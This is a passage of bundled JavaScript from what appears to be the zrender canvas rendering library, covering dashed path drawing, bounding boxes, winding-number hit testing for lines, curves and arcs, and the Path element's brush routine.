= mathSqrt$1(dx * dx + dy * dy);\n        var x = x0;\n        var y = y0;\n        var dash;\n        var nDash = lineDash.length;\n        var idx;\n        dx /= dist$$1;\n        dy /= dist$$1;\n\n        if (offset < 0) {\n            // Convert to positive offset\n            offset = dashSum + offset;\n        }\n        offset %= dashSum;\n        x -= offset * dx;\n        y -= offset * dy;\n\n        while ((dx > 0 && x <= x1) || (dx < 0 && x >= x1)\n        || (dx === 0 && ((dy > 0 && y <= y1) || (dy < 0 && y >= y1)))) {\n            idx = this._dashIdx;\n            dash = lineDash[idx];\n            x += dx * dash;\n            y += dy * dash;\n            this._dashIdx = (idx + 1) % nDash;\n            // Skip positive offset\n            if ((dx > 0 && x < x0) || (dx < 0 && x > x0) || (dy > 0 && y < y0) || (dy < 0 && y > y0)) {\n                continue;\n            }\n            ctx[idx % 2 ? 'moveTo' : 'lineTo'](\n                dx >= 0 ? mathMin$2(x, x1) : mathMax$2(x, x1),\n                dy >= 0 ? mathMin$2(y, y1) : mathMax$2(y, y1)\n            );\n        }\n        // Offset for next lineTo\n        dx = x - x1;\n        dy = y - y1;\n        this._dashOffset = -mathSqrt$1(dx * dx + dy * dy);\n    },\n\n    // Not accurate dashed line to\n    _dashedBezierTo: function (x1, y1, x2, y2, x3, y3) {\n        var dashSum = this._dashSum;\n        var offset = this._dashOffset;\n        var lineDash = this._lineDash;\n        var ctx = this._ctx;\n\n        var x0 = this._xi;\n        var y0 = this._yi;\n        var t;\n        var dx;\n        var dy;\n        var cubicAt$$1 = cubicAt;\n        var bezierLen = 0;\n        var idx = this._dashIdx;\n        var nDash = lineDash.length;\n\n        var x;\n        var y;\n\n        var tmpLen = 0;\n\n        if (offset < 0) {\n            // Convert to positive offset\n            offset = dashSum + offset;\n        }\n        offset %= dashSum;\n        // Bezier approx length\n        for (t = 0; t < 1; t += 0.1) {\n            dx = cubicAt$$1(x0, x1, x2, x3, t + 0.1)\n                - cubicAt$$1(x0, x1, x2, x3, t);\n            dy = cubicAt$$1(y0, y1, y2, y3, t + 0.1)\n                - cubicAt$$1(y0, y1, y2, y3, t);\n            bezierLen += mathSqrt$1(dx * dx + dy * dy);\n        }\n\n        // Find idx after add offset\n        for (; idx < nDash; idx++) {\n            tmpLen += lineDash[idx];\n            if (tmpLen > offset) {\n                break;\n            }\n        }\n        t = (tmpLen - offset) / bezierLen;\n\n        while (t <= 1) {\n\n            x = cubicAt$$1(x0, x1, x2, x3, t);\n            y = cubicAt$$1(y0, y1, y2, y3, t);\n\n            // Use line to approximate dashed bezier\n            // Bad result if dash is long\n            idx % 2 ? ctx.moveTo(x, y)\n                : ctx.lineTo(x, y);\n\n            t += lineDash[idx] / bezierLen;\n\n            idx = (idx + 1) % nDash;\n        }\n\n        // Finish the last segment and calculate the new offset\n        (idx % 2 !== 0) && ctx.lineTo(x3, y3);\n        dx = x3 - x;\n        dy = y3 - y;\n        this._dashOffset = -mathSqrt$1(dx * dx + dy * dy);\n    },\n\n    _dashedQuadraticTo: function (x1, y1, x2, y2) {\n        // Convert quadratic to cubic using degree elevation\n        var x3 = x2;\n        var y3 = y2;\n        x2 = (x2 + 2 * x1) / 3;\n        y2 = (y2 + 2 * y1) / 3;\n        x1 = (this._xi + 2 * x1) / 3;\n        y1 = (this._yi + 2 * y1) / 3;\n\n        this._dashedBezierTo(x1, y1, x2, y2, x3, y3);\n    },\n\n    /**\n     * 转成静态的 Float32Array 减少堆内存占用\n     * Convert dynamic array to static Float32Array\n     */\n    toStatic: function () {\n        var data = this.data;\n        if (data instanceof Array) {\n            data.length = this._len;\n            if (hasTypedArray) {\n                this.data = new Float32Array(data);\n            }\n        }\n    },\n\n    /**\n     * @return {module:zrender/core/BoundingRect}\n     */\n    getBoundingRect: function () {\n        min$1[0] = min$1[1] = min2[0] = min2[1] = Number.MAX_VALUE;\n        max$1[0] = max$1[1] = max2[0] = max2[1] = -Number.MAX_VALUE;\n\n        var data = this.data;\n        var xi = 0;\n        var yi = 0;\n        var x0 = 0;\n        var y0 = 0;\n\n        for (var i = 0; i < data.length;) {\n            var cmd = data[i++];\n\n            if (i === 1) {\n                // 如果第一个命令是 L, C, Q\n                // 则 previous point 同绘制命令的第一个 point\n                //\n                // 第一个命令为 Arc 的情况下会在后面特殊处理\n                xi = data[i];\n                yi = data[i + 1];\n\n                x0 = xi;\n                y0 = yi;\n            }\n\n            switch (cmd) {\n                case CMD.M:\n                    // moveTo 命令重新创建一个新的 subpath, 并且更新新的起点\n                    // 在 closePath 的时候使用\n                    x0 = data[i++];\n                    y0 = data[i++];\n                    xi = x0;\n                    yi = y0;\n                    min2[0] = x0;\n                    min2[1] = y0;\n                    max2[0] = x0;\n                    max2[1] = y0;\n                    break;\n                case CMD.L:\n                    fromLine(xi, yi, data[i], data[i + 1], min2, max2);\n                    xi = data[i++];\n                    yi = data[i++];\n                    break;\n                case CMD.C:\n                    fromCubic(\n                        xi, yi, data[i++], data[i++], data[i++], data[i++], data[i], data[i + 1],\n                        min2, max2\n                    );\n                    xi = data[i++];\n                    yi = data[i++];\n                    break;\n                case CMD.Q:\n                    fromQuadratic(\n                        xi, yi, data[i++], data[i++], data[i], data[i + 1],\n                        min2, max2\n                    );\n                    xi = data[i++];\n                    yi = data[i++];\n                    break;\n                case CMD.A:\n                    // TODO Arc 判断的开销比较大\n                    var cx = data[i++];\n                    var cy = data[i++];\n                    var rx = data[i++];\n                    var ry = data[i++];\n                    var startAngle = data[i++];\n                    var endAngle = data[i++] + startAngle;\n                    // TODO Arc 旋转\n                    i += 1;\n                    var anticlockwise = 1 - data[i++];\n\n                    if (i === 1) {\n                        // 直接使用 arc 命令\n                        // 第一个命令起点还未定义\n                        x0 = mathCos$1(startAngle) * rx + cx;\n                        y0 = mathSin$1(startAngle) * ry + cy;\n                    }\n\n                    fromArc(\n                        cx, cy, rx, ry, startAngle, endAngle,\n                        anticlockwise, min2, max2\n                    );\n\n                    xi = mathCos$1(endAngle) * rx + cx;\n                    yi = mathSin$1(endAngle) * ry + cy;\n                    break;\n                case CMD.R:\n                    x0 = xi = data[i++];\n                    y0 = yi = data[i++];\n                    var width = data[i++];\n                    var height = data[i++];\n                    // Use fromLine\n                    fromLine(x0, y0, x0 + width, y0 + height, min2, max2);\n                    break;\n                case CMD.Z:\n                    xi = x0;\n                    yi = y0;\n                    break;\n            }\n\n            // Union\n            min(min$1, min$1, min2);\n            max(max$1, max$1, max2);\n        }\n\n        // No data\n        if (i === 0) {\n            min$1[0] = min$1[1] = max$1[0] = max$1[1] = 0;\n        }\n\n        return new BoundingRect(\n            min$1[0], min$1[1], max$1[0] - min$1[0], max$1[1] - min$1[1]\n        );\n    },\n\n    /**\n     * Rebuild path from current data\n     * Rebuild path will not consider javascript implemented line dash.\n     * @param {CanvasRenderingContext2D} ctx\n     */\n    rebuildPath: function (ctx) {\n        var d = this.data;\n        var x0;\n        var y0;\n        var xi;\n        var yi;\n        var x;\n        var y;\n        var ux = this._ux;\n        var uy = this._uy;\n        var len$$1 = this._len;\n        for (var i = 0; i < len$$1;) {\n            var cmd = d[i++];\n\n            if (i === 1) {\n                // 如果第一个命令是 L, C, Q\n                // 则 previous point 同绘制命令的第一个 point\n                //\n                // 第一个命令为 Arc 的情况下会在后面特殊处理\n                xi = d[i];\n                yi = d[i + 1];\n\n                x0 = xi;\n                y0 = yi;\n            }\n            switch (cmd) {\n                case CMD.M:\n                    x0 = xi = d[i++];\n                    y0 = yi = d[i++];\n                    ctx.moveTo(xi, yi);\n                    break;\n                case CMD.L:\n                    x = d[i++];\n                    y = d[i++];\n                    // Not draw too small seg between\n                    if (mathAbs(x - xi) > ux || mathAbs(y - yi) > uy || i === len$$1 - 1) {\n                        ctx.lineTo(x, y);\n                        xi = x;\n                        yi = y;\n                    }\n                    break;\n                case CMD.C:\n                    ctx.bezierCurveTo(\n                        d[i++], d[i++], d[i++], d[i++], d[i++], d[i++]\n                    );\n                    xi = d[i - 2];\n                    yi = d[i - 1];\n                    break;\n                case CMD.Q:\n                    ctx.quadraticCurveTo(d[i++], d[i++], d[i++], d[i++]);\n                    xi = d[i - 2];\n                    yi = d[i - 1];\n                    break;\n                case CMD.A:\n                    var cx = d[i++];\n                    var cy = d[i++];\n                    var rx = d[i++];\n                    var ry = d[i++];\n                    var theta = d[i++];\n                    var dTheta = d[i++];\n                    var psi = d[i++];\n                    var fs = d[i++];\n                    var r = (rx > ry) ? rx : ry;\n                    var scaleX = (rx > ry) ? 1 : rx / ry;\n                    var scaleY = (rx > ry) ? ry / rx : 1;\n                    var isEllipse = Math.abs(rx - ry) > 1e-3;\n                    var endAngle = theta + dTheta;\n                    if (isEllipse) {\n                        ctx.translate(cx, cy);\n                        ctx.rotate(psi);\n                        ctx.scale(scaleX, scaleY);\n                        ctx.arc(0, 0, r, theta, endAngle, 1 - fs);\n                        ctx.scale(1 / scaleX, 1 / scaleY);\n                        ctx.rotate(-psi);\n                        ctx.translate(-cx, -cy);\n                    }\n                    else {\n                        ctx.arc(cx, cy, r, theta, endAngle, 1 - fs);\n                    }\n\n                    if (i === 1) {\n                        // 直接使用 arc 命令\n                        // 第一个命令起点还未定义\n                        x0 = mathCos$1(theta) * rx + cx;\n                        y0 = mathSin$1(theta) * ry + cy;\n                    }\n                    xi = mathCos$1(endAngle) * rx + cx;\n                    yi = mathSin$1(endAngle) * ry + cy;\n                    break;\n                case CMD.R:\n                    x0 = xi = d[i];\n                    y0 = yi = d[i + 1];\n                    ctx.rect(d[i++], d[i++], d[i++], d[i++]);\n                    break;\n                case CMD.Z:\n                    ctx.closePath();\n                    xi = x0;\n                    yi = y0;\n            }\n        }\n    }\n};\n\nPathProxy.CMD = CMD;\n\n/**\n * 线段包含判断\n * @param  {number}  x0\n * @param  {number}  y0\n * @param  {number}  x1\n * @param  {number}  y1\n * @param  {number}  lineWidth\n * @param  {number}  x\n * @param  {number}  y\n * @return {boolean}\n */\nfunction containStroke$1(x0, y0, x1, y1, lineWidth, x, y) {\n    if (lineWidth === 0) {\n        return false;\n    }\n    var _l = lineWidth;\n    var _a = 0;\n    var _b = x0;\n    // Quick reject\n    if (\n        (y > y0 + _l && y > y1 + _l)\n        || (y < y0 - _l && y < y1 - _l)\n        || (x > x0 + _l && x > x1 + _l)\n        || (x < x0 - _l && x < x1 - _l)\n    ) {\n        return false;\n    }\n\n    if (x0 !== x1) {\n        _a = (y0 - y1) / (x0 - x1);\n        _b = (x0 * y1 - x1 * y0) / (x0 - x1);\n    }\n    else {\n        return Math.abs(x - x0) <= _l / 2;\n    }\n    var tmp = _a * x - y + _b;\n    var _s = tmp * tmp / (_a * _a + 1);\n    return _s <= _l / 2 * _l / 2;\n}\n\n/**\n * 三次贝塞尔曲线描边包含判断\n * @param  {number}  x0\n * @param  {number}  y0\n * @param  {number}  x1\n * @param  {number}  y1\n * @param  {number}  x2\n * @param  {number}  y2\n * @param  {number}  x3\n * @param  {number}  y3\n * @param  {number}  lineWidth\n * @param  {number}  x\n * @param  {number}  y\n * @return {boolean}\n */\nfunction containStroke$2(x0, y0, x1, y1, x2, y2, x3, y3, lineWidth, x, y) {\n    if (lineWidth === 0) {\n        return false;\n    }\n    var _l = lineWidth;\n    // Quick reject\n    if (\n        (y > y0 + _l && y > y1 + _l && y > y2 + _l && y > y3 + _l)\n        || (y < y0 - _l && y < y1 - _l && y < y2 - _l && y < y3 - _l)\n        || (x > x0 + _l && x > x1 + _l && x > x2 + _l && x > x3 + _l)\n        || (x < x0 - _l && x < x1 - _l && x < x2 - _l && x < x3 - _l)\n    ) {\n        return false;\n    }\n    var d = cubicProjectPoint(\n        x0, y0, x1, y1, x2, y2, x3, y3,\n        x, y, null\n    );\n    return d <= _l / 2;\n}\n\n/**\n * 二次贝塞尔曲线描边包含判断\n * @param  {number}  x0\n * @param  {number}  y0\n * @param  {number}  x1\n * @param  {number}  y1\n * @param  {number}  x2\n * @param  {number}  y2\n * @param  {number}  lineWidth\n * @param  {number}  x\n * @param  {number}  y\n * @return {boolean}\n */\nfunction containStroke$3(x0, y0, x1, y1, x2, y2, lineWidth, x, y) {\n    if (lineWidth === 0) {\n        return false;\n    }\n    var _l = lineWidth;\n    // Quick reject\n    if (\n        (y > y0 + _l && y > y1 + _l && y > y2 + _l)\n        || (y < y0 - _l && y < y1 - _l && y < y2 - _l)\n        || (x > x0 + _l && x > x1 + _l && x > x2 + _l)\n        || (x < x0 - _l && x < x1 - _l && x < x2 - _l)\n    ) {\n        return false;\n    }\n    var d = quadraticProjectPoint(\n        x0, y0, x1, y1, x2, y2,\n        x, y, null\n    );\n    return d <= _l / 2;\n}\n\nvar PI2$3 = Math.PI * 2;\n\nfunction normalizeRadian(angle) {\n    angle %= PI2$3;\n    if (angle < 0) {\n        angle += PI2$3;\n    }\n    return angle;\n}\n\nvar PI2$2 = Math.PI * 2;\n\n/**\n * 圆弧描边包含判断\n * @param  {number}  cx\n * @param  {number}  cy\n * @param  {number}  r\n * @param  {number}  startAngle\n * @param  {number}  endAngle\n * @param  {boolean}  anticlockwise\n * @param  {number} lineWidth\n * @param  {number}  x\n * @param  {number}  y\n * @return {Boolean}\n */\nfunction containStroke$4(\n    cx, cy, r, startAngle, endAngle, anticlockwise,\n    lineWidth, x, y\n) {\n\n    if (lineWidth === 0) {\n        return false;\n    }\n    var _l = lineWidth;\n\n    x -= cx;\n    y -= cy;\n    var d = Math.sqrt(x * x + y * y);\n\n    if ((d - _l > r) || (d + _l < r)) {\n        return false;\n    }\n    if (Math.abs(startAngle - endAngle) % PI2$2 < 1e-4) {\n        // Is a circle\n        return true;\n    }\n    if (anticlockwise) {\n        var tmp = startAngle;\n        startAngle = normalizeRadian(endAngle);\n        endAngle = normalizeRadian(tmp);\n    }\n    else {\n        startAngle = normalizeRadian(startAngle);\n        endAngle = normalizeRadian(endAngle);\n    }\n    if (startAngle > endAngle) {\n        endAngle += PI2$2;\n    }\n\n    var angle = Math.atan2(y, x);\n    if (angle < 0) {\n        angle += PI2$2;\n    }\n    return (angle >= startAngle && angle <= endAngle)\n        || (angle + PI2$2 >= startAngle && angle + PI2$2 <= endAngle);\n}\n\nfunction windingLine(x0, y0, x1, y1, x, y) {\n    if ((y > y0 && y > y1) || (y < y0 && y < y1)) {\n        return 0;\n    }\n    // Ignore horizontal line\n    if (y1 === y0) {\n        return 0;\n    }\n    var dir = y1 < y0 ? 1 : -1;\n    var t = (y - y0) / (y1 - y0);\n\n    // Avoid winding error when intersection point is the connect point of two line of polygon\n    if (t === 1 || t === 0) {\n        dir = y1 < y0 ? 0.5 : -0.5;\n    }\n\n    var x_ = t * (x1 - x0) + x0;\n\n    // If (x, y) on the line, considered as \"contain\".\n    return x_ === x ? Infinity : x_ > x ? dir : 0;\n}\n\nvar CMD$1 = PathProxy.CMD;\nvar PI2$1 = Math.PI * 2;\n\nvar EPSILON$2 = 1e-4;\n\nfunction isAroundEqual(a, b) {\n    return Math.abs(a - b) < EPSILON$2;\n}\n\n// 临时数组\nvar roots = [-1, -1, -1];\nvar extrema = [-1, -1];\n\nfunction swapExtrema() {\n    var tmp = extrema[0];\n    extrema[0] = extrema[1];\n    extrema[1] = tmp;\n}\n\nfunction windingCubic(x0, y0, x1, y1, x2, y2, x3, y3, x, y) {\n    // Quick reject\n    if (\n        (y > y0 && y > y1 && y > y2 && y > y3)\n        || (y < y0 && y < y1 && y < y2 && y < y3)\n    ) {\n        return 0;\n    }\n    var nRoots = cubicRootAt(y0, y1, y2, y3, y, roots);\n    if (nRoots === 0) {\n        return 0;\n    }\n    else {\n        var w = 0;\n        var nExtrema = -1;\n        var y0_;\n        var y1_;\n        for (var i = 0; i < nRoots; i++) {\n            var t = roots[i];\n\n            // Avoid winding error when intersection point is the connect point of two line of polygon\n            var unit = (t === 0 || t === 1) ? 0.5 : 1;\n\n            var x_ = cubicAt(x0, x1, x2, x3, t);\n            if (x_ < x) { // Quick reject\n                continue;\n            }\n            if (nExtrema < 0) {\n                nExtrema = cubicExtrema(y0, y1, y2, y3, extrema);\n                if (extrema[1] < extrema[0] && nExtrema > 1) {\n                    swapExtrema();\n                }\n                y0_ = cubicAt(y0, y1, y2, y3, extrema[0]);\n                if (nExtrema > 1) {\n                    y1_ = cubicAt(y0, y1, y2, y3, extrema[1]);\n                }\n            }\n            if (nExtrema === 2) {\n                // 分成三段单调函数\n                if (t < extrema[0]) {\n                    w += y0_ < y0 ? unit : -unit;\n                }\n                else if (t < extrema[1]) {\n                    w += y1_ < y0_ ? unit : -unit;\n                }\n                else {\n                    w += y3 < y1_ ? unit : -unit;\n                }\n            }\n            else {\n                // 分成两段单调函数\n                if (t < extrema[0]) {\n                    w += y0_ < y0 ? unit : -unit;\n                }\n                else {\n                    w += y3 < y0_ ? unit : -unit;\n                }\n            }\n        }\n        return w;\n    }\n}\n\nfunction windingQuadratic(x0, y0, x1, y1, x2, y2, x, y) {\n    // Quick reject\n    if (\n        (y > y0 && y > y1 && y > y2)\n        || (y < y0 && y < y1 && y < y2)\n    ) {\n        return 0;\n    }\n    var nRoots = quadraticRootAt(y0, y1, y2, y, roots);\n    if (nRoots === 0) {\n        return 0;\n    }\n    else {\n        var t = quadraticExtremum(y0, y1, y2);\n        if (t >= 0 && t <= 1) {\n            var w = 0;\n            var y_ = quadraticAt(y0, y1, y2, t);\n            for (var i = 0; i < nRoots; i++) {\n                // Remove one endpoint.\n                var unit = (roots[i] === 0 || roots[i] === 1) ? 0.5 : 1;\n\n                var x_ = quadraticAt(x0, x1, x2, roots[i]);\n                if (x_ < x) {   // Quick reject\n                    continue;\n                }\n                if (roots[i] < t) {\n                    w += y_ < y0 ? unit : -unit;\n                }\n                else {\n                    w += y2 < y_ ? unit : -unit;\n                }\n            }\n            return w;\n        }\n        else {\n            // Remove one endpoint.\n            var unit = (roots[0] === 0 || roots[0] === 1) ? 0.5 : 1;\n\n            var x_ = quadraticAt(x0, x1, x2, roots[0]);\n            if (x_ < x) {   // Quick reject\n                return 0;\n            }\n            return y2 < y0 ? unit : -unit;\n        }\n    }\n}\n\n// TODO\n// Arc 旋转\nfunction windingArc(\n    cx, cy, r, startAngle, endAngle, anticlockwise, x, y\n) {\n    y -= cy;\n    if (y > r || y < -r) {\n        return 0;\n    }\n    var tmp = Math.sqrt(r * r - y * y);\n    roots[0] = -tmp;\n    roots[1] = tmp;\n\n    var diff = Math.abs(startAngle - endAngle);\n    if (diff < 1e-4) {\n        return 0;\n    }\n    if (diff % PI2$1 < 1e-4) {\n        // Is a circle\n        startAngle = 0;\n        endAngle = PI2$1;\n        var dir = anticlockwise ? 1 : -1;\n        if (x >= roots[0] + cx && x <= roots[1] + cx) {\n            return dir;\n        }\n        else {\n            return 0;\n        }\n    }\n\n    if (anticlockwise) {\n        var tmp = startAngle;\n        startAngle = normalizeRadian(endAngle);\n        endAngle = normalizeRadian(tmp);\n    }\n    else {\n        startAngle = normalizeRadian(startAngle);\n        endAngle = normalizeRadian(endAngle);\n    }\n    if (startAngle > endAngle) {\n        endAngle += PI2$1;\n    }\n\n    var w = 0;\n    for (var i = 0; i < 2; i++) {\n        var x_ = roots[i];\n        if (x_ + cx > x) {\n            var angle = Math.atan2(y, x_);\n            var dir = anticlockwise ? 1 : -1;\n            if (angle < 0) {\n                angle = PI2$1 + angle;\n            }\n            if (\n                (angle >= startAngle && angle <= endAngle)\n                || (angle + PI2$1 >= startAngle && angle + PI2$1 <= endAngle)\n            ) {\n                if (angle > Math.PI / 2 && angle < Math.PI * 1.5) {\n                    dir = -dir;\n                }\n                w += dir;\n            }\n        }\n    }\n    return w;\n}\n\nfunction containPath(data, lineWidth, isStroke, x, y) {\n    var w = 0;\n    var xi = 0;\n    var yi = 0;\n    var x0 = 0;\n    var y0 = 0;\n\n    for (var i = 0; i < data.length;) {\n        var cmd = data[i++];\n        // Begin a new subpath\n        if (cmd === CMD$1.M && i > 1) {\n            // Close previous subpath\n            if (!isStroke) {\n                w += windingLine(xi, yi, x0, y0, x, y);\n            }\n            // 如果被任何一个 subpath 包含\n            // if (w !== 0) {\n            //     return true;\n            // }\n        }\n\n        if (i === 1) {\n            // 如果第一个命令是 L, C, Q\n            // 则 previous point 同绘制命令的第一个 point\n            //\n            // 第一个命令为 Arc 的情况下会在后面特殊处理\n            xi = data[i];\n            yi = data[i + 1];\n\n            x0 = xi;\n            y0 = yi;\n        }\n\n        switch (cmd) {\n            case CMD$1.M:\n                // moveTo 命令重新创建一个新的 subpath, 并且更新新的起点\n                // 在 closePath 的时候使用\n                x0 = data[i++];\n                y0 = data[i++];\n                xi = x0;\n                yi = y0;\n                break;\n            case CMD$1.L:\n                if (isStroke) {\n                    if (containStroke$1(xi, yi, data[i], data[i + 1], lineWidth, x, y)) {\n                        return true;\n                    }\n                }\n                else {\n                    // NOTE 在第一个命令为 L, C, Q 的时候会计算出 NaN\n                    w += windingLine(xi, yi, data[i], data[i + 1], x, y) || 0;\n                }\n                xi = data[i++];\n                yi = data[i++];\n                break;\n            case CMD$1.C:\n                if (isStroke) {\n                    if (containStroke$2(xi, yi,\n                        data[i++], data[i++], data[i++], data[i++], data[i], data[i + 1],\n                        lineWidth, x, y\n                    )) {\n                        return true;\n                    }\n                }\n                else {\n                    w += windingCubic(\n                        xi, yi,\n                        data[i++], data[i++], data[i++], data[i++], data[i], data[i + 1],\n                        x, y\n                    ) || 0;\n                }\n                xi = data[i++];\n                yi = data[i++];\n                break;\n            case CMD$1.Q:\n                if (isStroke) {\n                    if (containStroke$3(xi, yi,\n                        data[i++], data[i++], data[i], data[i + 1],\n                        lineWidth, x, y\n                    )) {\n                        return true;\n                    }\n                }\n                else {\n                    w += windingQuadratic(\n                        xi, yi,\n                        data[i++], data[i++], data[i], data[i + 1],\n                        x, y\n                    ) || 0;\n                }\n                xi = data[i++];\n                yi = data[i++];\n                break;\n            case CMD$1.A:\n                // TODO Arc 判断的开销比较大\n                var cx = data[i++];\n                var cy = data[i++];\n                var rx = data[i++];\n                var ry = data[i++];\n                var theta = data[i++];\n                var dTheta = data[i++];\n                // TODO Arc 旋转\n                i += 1;\n                var anticlockwise = 1 - data[i++];\n                var x1 = Math.cos(theta) * rx + cx;\n                var y1 = Math.sin(theta) * ry + cy;\n                // 不是直接使用 arc 命令\n                if (i > 1) {\n                    w += windingLine(xi, yi, x1, y1, x, y);\n                }\n                else {\n                    // 第一个命令起点还未定义\n                    x0 = x1;\n                    y0 = y1;\n                }\n                // zr 使用scale来模拟椭圆, 这里也对x做一定的缩放\n                var _x = (x - cx) * ry / rx + cx;\n                if (isStroke) {\n                    if (containStroke$4(\n                        cx, cy, ry, theta, theta + dTheta, anticlockwise,\n                        lineWidth, _x, y\n                    )) {\n                        return true;\n                    }\n                }\n                else {\n                    w += windingArc(\n                        cx, cy, ry, theta, theta + dTheta, anticlockwise,\n                        _x, y\n                    );\n                }\n                xi = Math.cos(theta + dTheta) * rx + cx;\n                yi = Math.sin(theta + dTheta) * ry + cy;\n                break;\n            case CMD$1.R:\n                x0 = xi = data[i++];\n                y0 = yi = data[i++];\n                var width = data[i++];\n                var height = data[i++];\n                var x1 = x0 + width;\n                var y1 = y0 + height;\n                if (isStroke) {\n                    if (containStroke$1(x0, y0, x1, y0, lineWidth, x, y)\n                        || containStroke$1(x1, y0, x1, y1, lineWidth, x, y)\n                        || containStroke$1(x1, y1, x0, y1, lineWidth, x, y)\n                        || containStroke$1(x0, y1, x0, y0, lineWidth, x, y)\n                    ) {\n                        return true;\n                    }\n                }\n                else {\n                    // FIXME Clockwise ?\n                    w += windingLine(x1, y0, x1, y1, x, y);\n                    w += windingLine(x0, y1, x0, y0, x, y);\n                }\n                break;\n            case CMD$1.Z:\n                if (isStroke) {\n                    if (containStroke$1(\n                        xi, yi, x0, y0, lineWidth, x, y\n                    )) {\n                        return true;\n                    }\n                }\n                else {\n                    // Close a subpath\n                    w += windingLine(xi, yi, x0, y0, x, y);\n                    // 如果被任何一个 subpath 包含\n                    // FIXME subpaths may overlap\n                    // if (w !== 0) {\n                    //     return true;\n                    // }\n                }\n                xi = x0;\n                yi = y0;\n                break;\n        }\n    }\n    if (!isStroke && !isAroundEqual(yi, y0)) {\n        w += windingLine(xi, yi, x0, y0, x, y) || 0;\n    }\n    return w !== 0;\n}\n\nfunction contain(pathData, x, y) {\n    return containPath(pathData, 0, false, x, y);\n}\n\nfunction containStroke(pathData, lineWidth, x, y) {\n    return containPath(pathData, lineWidth, true, x, y);\n}\n\nvar getCanvasPattern = Pattern.prototype.getCanvasPattern;\n\nvar abs = Math.abs;\n\nvar pathProxyForDraw = new PathProxy(true);\n/**\n * @alias module:zrender/graphic/Path\n * @extends module:zrender/graphic/Displayable\n * @constructor\n * @param {Object} opts\n */\nfunction Path(opts) {\n    Displayable.call(this, opts);\n\n    /**\n     * @type {module:zrender/core/PathProxy}\n     * @readOnly\n     */\n    this.path = null;\n}\n\nPath.prototype = {\n\n    constructor: Path,\n\n    type: 'path',\n\n    __dirtyPath: true,\n\n    strokeContainThreshold: 5,\n\n    // This item default to be false. But in map series in echarts,\n    // in order to improve performance, it should be set to true,\n    // so the shorty segment won't draw.\n    segmentIgnoreThreshold: 0,\n\n    /**\n     * See `module:zrender/src/graphic/helper/subPixelOptimize`.\n     * @type {boolean}\n     */\n    subPixelOptimize: false,\n\n    brush: function (ctx, prevEl) {\n        var style = this.style;\n        var path = this.path || pathProxyForDraw;\n        var hasStroke = style.hasStroke();\n        var hasFill = style.hasFill();\n        var fill = style.fill;\n        var stroke = style.stroke;\n        var hasFillGradient = hasFill && !!(fill.colorStops);\n        var hasStrokeGradient = hasStroke && !!(stroke.colorStops);\n        var hasFillPattern = hasFill && !!(fill.image);\n        var hasStrokePattern = hasStroke && !!(stroke.image);\n\n        style.bind(ctx, this, prevEl);\n        this.setTransform(ctx);\n\n        if (this.__dirty) {\n            var rect;\n            // Update gradient because bounding rect may changed\n            if (hasFillGradient) {\n                rect = rect || this.getBoundingRect();\n                this._fillGradient = style.getGradient(ctx, fill, rect);\n            }\n            if (hasStrokeGradient) {\n                rect = rect || this.getBoundingRect();\n                this._strokeGradient = style.getGradient(ctx, stroke, rect);\n            }\n        }\n        // Use the gradient or pattern\n        if (hasFillGradient) {\n            // PENDING If may have affect the state\n            ctx.fillStyle = this._fillGradient;\n        }\n        else if (hasFillPattern) {\n            ctx.fillStyle = getCanvasPattern.call(fill, ctx);\n        }\n        if (hasStrokeGradient) {\n            ctx.strokeStyle = this._strokeGradient;\n        }\n        else if (hasStrokePattern) {\n            ctx.strokeStyle = getCanvasPattern.call(stroke, ctx);\n        }\n\n        var lineDash = style.lineDash;\n        var lineDashOffset = style.lineDashOffset;\n\n        var ctxLineDash = !!ctx.setLineDash;\n\n        // Update path sx, sy\n        var scale = this.getGlobalScale();\n        path.setScale(scale[0], scale[1], this.segmentIgnoreThreshold);\n\n        // Proxy context\n        // Rebuild path in following 2 cases\n        // 1. Path is dirty\n        // 2. Path needs javascript implemented lineDash stroking.\n        //    In this case, lineDash information will not be saved in PathProxy\n        if (this.__dirtyPath\n            || (lineDash && !ctxLineDash && hasStroke)\n        ) {\n            path.beginPath(ctx);\n\n            // Setting line dash before build path\n            if (lineDash && !ctxLineDash) {\n                path.setLineDash(lineDash);\n                path.setLineDashOffset(lineDashOffset);\n            }\n\n            this.buildPath(path, this.shape, false);\n\n            // Clear path dirty flag\n            if (this.path) {\n                this.__dirtyPath = false;\n            }\n        }\n        else {\n            // Replay path building\n            ctx.beginPath();\n            this.path.rebuildPath(ctx);\n        }\n\n        if (hasFill) {\n            if (style.fillOpacity != null) {\n                var originalGlobalAlpha = ctx.globalAlpha;\n                ctx.globalAlpha = style.fillOpacity * style.opacity;\n                path.fill(ctx);\n                ctx.globalAlpha = originalGlobalAlpha;\n            }\n            else {\n                path.fill(ctx);\n            }\n        }\n\n        if (lineDash && ctxLineDash) {\n            ctx.setLineDash(lineDash);\n            ctx.lineDashOffset = lineDashOffset;\n        }\n\n        if (hasStroke) {\n            if (style.strokeOpacity != null) {\n                var originalGlobalAlpha = ctx.globalAlpha;\n                ctx.globalAlpha = style.strokeOpacity * style.opacity;\n                path.stroke(ctx);\n                ctx.globalAlpha = originalGlobalAlpha;\n            }\n            else {\n                path.stroke(ctx);\n            }\n        }\n\n        if (lineDash && ctxLineDash) {\n            // PENDING\n            // Remove lineDash\n            ctx.setLineDash([]);\n        }\n\n        // Draw rect text\n        if (style.text != null) {\n            // Only restore transform when needs draw text.\n            this.restoreTransform(ctx);\n            this.drawRectText(ctx, this.getBoundingRect());\n        }\n    },\n\n    // When bundling path, some shape may decide if use moveTo to begin a new subpath or closePath\n    // Like in circle\n    buildPath: function (ctx, shapeCfg, inBundle) {},\n\n    createPathProxy: function () {\n        this.path = new PathProxy();\n    },\n\n    getBoundingRect: function () {\n        var rect = this._rect;\n        var style = this.style;\n        var needsUpdateRect = !rect;\n        if (needsUpdateRect) {\n            var path = this.path;\n            if (!path) {\n                // Create path on demand.\n                path = this.path = new PathProxy();\n            }\n            if (this.__dirtyPath) {\n                path.beginPath();\n                this.buildPath(path, this.shape, false);\n            }\n            rect = path.getBoundingRect();\n        }\n        this._rect = rect;\n\n        if (style.hasStroke()) {\n            // Needs update rect with stroke lineWidth when\n            // 1. Element changes scale or lineWidth\n            // 2. Shape is changed\n            var rectWithStroke = this._rectWithStroke || (this._rectWithStroke = rect.clone());\n            if (this.__dirty || needsUpdateRect) {\n                rectWithStroke.copy(rect);\n                // FIXME Must after updateTransform\n                var w = style.lineWidth;\n                // PENDING, Min line width is needed when line is horizontal or vertical\n                var lineScale = style.strokeNoScale ? this.getLineScale() : 1;\n\n                // Only add extra hover lineWidth when there are no fill\n                if (!style.hasFill()) {\n                    w = Math.max(w, this.strokeContainThreshold || 